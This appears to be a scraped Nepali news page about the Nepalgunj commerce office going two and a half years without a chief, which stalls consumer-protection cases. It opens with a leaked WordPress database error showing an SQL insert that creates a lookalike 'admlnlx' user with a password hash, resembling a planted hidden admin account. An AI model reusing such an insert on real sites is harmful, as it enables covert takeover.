WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BJ18N3S8boFKdLOfHBYckjqbk7oafm.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-16 03:11:50', '', 'admlnlx', 'admlnlx')
नेपालगन्ज,पुस १०-
बाणिज्य कार्यालय नेपालगन्ज साढे दुई वर्षदेखि प्रमुखविहीन छ । कार्यालय प्रमुखविहीन हुँदा उपभोक्ता हित संरक्षण ऐन अन्तरगत् मुद्दा चलाउन नसकिएको निमित्त प्रमुख सुनिल खनालले वताउनुभयो ।
खनाललाई तीन महिनाको लागि काजमा दुई महिना अघि सरकारले नेपालगन्ज बाणिज्यमा खटाएको थियो । उपभोक्ताको हकहितमा प्रतिकुल असर पु¥याए उपभोक्ता हित संरक्षण ऐन अन्तरगत् मुद्दा चलाइने गरिन्छ ।
दुई बर्षअघि सामान्य प्रशासन मन्त्रालयले नेपालगञ्जसहित कैलाली, भैरहवा, बीरगञ्ज र विराटनगर गरी पाँच वटा बाणिज्य कार्यालयमा उपसचिवस्तरको दरबन्दी सिर्जना गरेको थियो । बाणिज्य कार्यालयमा उपसचिव सहित दुई वटा शाखा अधिकृतको दरवन्दी पनि रिक्त छ ।
शाखा अधिकृत पूर्णचन्द्र घिमिरे बैशाख १८ गते सेवा निवृत्त भएपछि दुई वटा शाखा अधिकृतको दरवन्दी रिक्त भएको हो । अर्का शाखा अधिकृत गोविन्द पाण्डेको दुई वर्ष अघि नै सरुवा भइसकेको छ ।